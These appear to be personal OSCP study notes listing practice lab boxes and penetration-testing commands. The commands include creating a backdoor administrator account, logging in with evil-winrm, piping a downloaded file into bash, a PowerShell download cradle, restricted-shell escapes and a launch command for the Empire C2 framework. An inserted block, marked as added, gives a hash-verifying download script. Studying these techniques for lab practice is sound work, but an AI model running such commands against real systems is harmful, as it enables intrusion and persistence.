God notes

PG boxes on OSCP:

Heist, Hutch, Vault, Resourced (PG Practice)

HTB: APT, Fuse, Cascade, Monteverde, Resolute, Forest, Arkham, Active, Mantis

Cyber Seclabs:

Zero, Secret, Brute, Dictionary, Roast, Spray, Sync, Toast

Always look for config files if you have access to application files!

adds an admin account to the host

Try the Legion script for nmap scanning!

always do nmap -sC (default scripts)

If you are running as a service account you can create an admin account.

net user gori passwd123! /add & net localgroup administrators gori /add

evil-winrm -i IP -u gori -p 'passwd123!' to log in as the account you just created

net user gori to check its group membership / privileges


/etc/apache2: look for config files here

Linux enum

ldd --version (prints the glibc version)

Transfer module

curl IP/file_name | bash (pipes the download straight into bash and executes it)

cat /etc/lsb-release (distro and release version)

Transfer method

python -m SimpleHTTPServer 80 (Python 2; on Python 3 use python3 -m http.server 80)

-> curl -o outputfile IP/filename
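Added example (not from the original notes): the safer counterpart of curl | bash for the transfer method above. It downloads with curl -o as in the note, checks the file's SHA-256 against a digest obtained separately, and only then executes it. Assumes coreutils sha256sum and curl are available; the URL and digest are placeholders you supply.

```shell
#!/bin/sh
# Verify a downloaded file's SHA-256 before executing it, instead of
# piping the download straight into bash.

# verify_sha256 FILE EXPECTED_HEX -> 0 if the digest matches, 1 otherwise
verify_sha256() {
    _file=$1
    _expected=$2
    # sha256sum prints "<hex>  <name>"; keep only the hex digest
    _actual=$(sha256sum "$_file" | cut -d' ' -f1)
    [ "$_actual" = "$_expected" ]
}

# run_if_verified FILE EXPECTED_HEX -> runs FILE with sh only when the
# digest matches; returns the script's exit status, or 1 on a mismatch
run_if_verified() {
    _script=$1
    _expected=$2
    if verify_sha256 "$_script" "$_expected"; then
        sh "$_script"
    else
        echo "digest mismatch for $_script, not executing" >&2
        return 1
    fi
}

# fetch_and_run URL EXPECTED_HEX -> curl -o into a temp file, verify, run,
# and remove the temp file either way; returns 2 if the download fails
fetch_and_run() {
    _url=$1
    _expected=$2
    _tmp=$(mktemp) || return 2
    if ! curl -fsS -o "$_tmp" "$_url"; then
        rm -f "$_tmp"
        return 2
    fi
    run_if_verified "$_tmp" "$_expected"
    _rc=$?
    rm -f "$_tmp"
    return $_rc
}

# Usage (placeholder values, not from the notes):
#   fetch_and_run http://IP/filename <sha256 you got out of band>
```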

Restricted shell? Try this:

ssh mindy@ -t "bash --noprofile" (skip the profile that sets up the restricted shell)

hacker@ahoafhoaf:~$ BASH_CMDS[a]=/bin/sh;a 

$ /bin/bash
bash: groups: command not found
hacker@ahoafhoaf:~$ export PATH=$PATH:/bin/
hacker@ahoafhoaf:~$ export PATH=$PATH:/usr/bin


Run sudo

PowerShell download cradle: IEX(New-Object Net.WebClient).DownloadString('')

Start the Empire container with a bash entrypoint (port 443 published):

docker run -it --name empire -v empire-data:/opt/Empire/data \
 -p 443:443 --entrypoint bash empireproject/empire
